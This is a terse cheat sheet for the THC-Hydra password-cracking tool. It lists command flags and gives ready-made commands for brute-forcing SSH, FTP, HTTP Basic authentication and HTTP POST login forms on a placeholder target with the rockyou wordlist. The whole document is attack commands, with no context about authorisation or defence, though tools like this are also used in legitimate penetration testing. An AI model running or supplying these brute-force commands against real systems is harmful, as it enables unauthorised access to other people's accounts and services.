https://github.com/vanhauser-thc/thc-hydra
Basis
hydra -l username -P wordlist.txt [TARGET_IP] service
Flags
-VVerbose.
-vVVery Verbose.
-L myUsersFileSpecify usernames file list.
-l myUserSpecify username.
-P myPassFileSpecify password file list.
-p myPassSpecify password.
-sSpecify port.
-t 4Number of parallel connections per target.
SSH
hydra -L myUsersFile -P myPassFile [TARGET_IP] sshBrute Force SSH.
POST
hydra -vV -L myUsersFile.txt -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-post-form ‘/path/to/form.php:username=^USER^&password=^PASS^&login=Login:F=ChainNotOK’Brute Force HTTP POST form with valid username.
Basic Access Auth
hydra -vV -l myUser -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-get /path/Brute Force HTTP Basic Access Authentication.
FTP
hydra -vV -l myUser -P /usr/share/wordlists/rockyou.txt [TARGET_IP] ftpBrute Force FTP Login.